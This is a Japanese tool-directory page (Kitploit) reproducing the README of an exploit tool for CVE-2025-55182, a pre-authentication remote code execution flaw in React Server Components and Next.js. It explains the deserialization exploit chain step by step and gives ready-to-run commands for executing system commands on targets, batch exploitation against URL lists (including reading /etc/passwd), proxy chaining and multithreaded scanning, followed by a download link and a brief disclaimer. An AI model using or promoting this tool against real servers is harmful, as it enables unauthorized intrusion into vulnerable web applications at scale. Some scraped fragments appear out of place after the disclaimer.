Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 | Kitploit
ツール/GitHubGitHub/luoluoqingge/cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 - React2Shell

React Server Components / Next.js Pre-Authentication Remote Code Execution

属性値
CVE IDCVE-2025-55182
CVSS10.0 (Critical)
CWECWE-502: Deserialization of Untrusted Data
タイプPre-Auth RCE

影響範囲

コンポーネント影響を受けるバージョン
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
関連パッケージreact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

脆弱性の原理

この脆弱性は、React Server Components (RSC) Flight プロトコルにおける逆シリアル化の欠陥を利用し、悪意のある multipart/form-data リクエストを構築することで、認証なしのリモートコード実行を実現します。完全なエクスプロイトチェーンは以下のとおりです。

  1. POST multipart/form-data と Next-Action リクエストヘッダーを組み合わせて Server Action パスをトリガーします
  2. Chunk "0" には巧妙に構築された JSON オブジェクト(配列でラップされていない)が含まれており、$1:__proto__:then が PENDING 状態の Chunk 1 オブジェクト上の Chunk.prototype.then にアクセスして、それを thenable にします
  3. $1:constructor:constructor はプロトタイプチェーンを通じて Function コンストラクターに解決されます
  4. Chunk.prototype.then は initializeModelChunk を呼び出して value フィールド '{"then":"$B0"}' を解析します
  5. $B0 blob の解析は _formData.get(_prefix + "0")、すなわち Function(code + "0") を呼び出します

依存関係のインストール

root@kitploit:~
pip install requests[socks]

スクリプトは依存関係が不足している場合、requests と PySocks のインストールを自動的に試みます。

使用方法

単一ターゲット RCE

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id"

バッチ利用

root@kitploit:~
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

脆弱性の検出のみ(コマンドを実行しない)

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

プロキシの使用

root@kitploit:~
# HTTP プロキシ
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# SOCKS5 プロキシ
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

デバッグモード

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id" -v

全パラメータの説明

出力の説明

  • VULN — ターゲットに脆弱性が存在し、コマンド実行結果の取得に成功
  • MAYBE — 脆弱性が存在する可能性がある(読み取りタイムアウトなど)
  • ERR — 接続エラー
  • SAFE — 脆弱性が検出されなかった

バッチスキャンの結果は -o で指定された出力ファイルに書き込まれ、脆弱性の存在が確認されたターゲットのみが記録されます。

targets.txt 形式の例

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# 注释行会被忽略

免責事項

本ツールは許可を得たセキュリティテストおよびセキュリティ研究の目的のみに使用してください。利用者は、対象システムの所有者から明確な許可を得ていることを確認する必要があります。許可なくシステムへのペネトレーションテストを行うことは違法行為であり、利用者はすべての法的責任を自ら負うものとします。

ツールをダウンロード
  • 返された関数オブジェクト自体が then プロパティを持ち、thenable と見なされて呼び出され、コード実行がトリガーされて RCE が実現します
  • パラメータ説明デフォルト値
    -u, --url単一ターゲットの URL(-f とは排他的)-
    -f, --fileターゲット URL のリストファイル(1行に1つ)(-u とは排他的)-
    -c, --command実行するシステムコマンド(--check モードでは必須ではない)-
    -o, --output結果の出力ファイルresults.txt
    -t, --threads同時実行スレッド数10
    -v, --verboseデバッグ出力を表示False
    --proxyプロキシアドレス。HTTP および SOCKS5 に対応-
    --timeoutリクエストのタイムアウト時間(秒)15
    --check脆弱性の検出のみ行い、システムコマンドを実行しないFalse
    --verify-sslTLS 証明書を検証False